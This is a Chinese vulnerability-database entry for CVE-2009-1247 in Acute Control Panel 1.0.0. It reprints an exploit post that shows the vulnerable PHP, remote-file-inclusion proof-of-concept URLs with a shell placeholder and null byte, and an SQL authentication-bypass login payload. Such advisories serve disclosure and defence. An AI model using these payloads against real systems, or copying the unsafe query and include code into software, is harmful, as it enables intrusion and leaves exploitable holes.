Acute Control Panel 'login.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117512 漏洞类型 SQL注入
发布时间 2009-03-26 更新时间 2009-04-07
CVE编号 CVE-2009-1247 CNNVD-ID CNNVD-200904-113
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8291
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-113
|漏洞详情
AcuteControlPanel1.0.0版本中的login.php存在SQL注入漏洞。远程攻击者可以借助用户名参数,执行任意的SQL指令。
|漏洞EXP
###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################

[+] Remote File Inclusion

 Vulnerable code in container.php

-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 Vulnerable code in header.php

--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] SQL Injection (Auth Bypass)

 Vulnerable code in login.php

--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------

 PoC :

  Username : admin ' or ' 1=1
  Password : anything or nothing

################################################################

# milw0rm.com [2009-03-26]
|参考资料

来源:XF
名称:acutecontrol-login-sql-injection(49444)
链接:http://xforce.iss.net/xforce/xfdb/49444
来源:BID
名称:34265
链接:http://www.securityfocus.com/bid/34265
来源:MILW0RM
名称:8291
链接:http://www.milw0rm.com/exploits/8291
来源:SECUNIA
名称:34485
链接:http://secunia.com/advisories/34485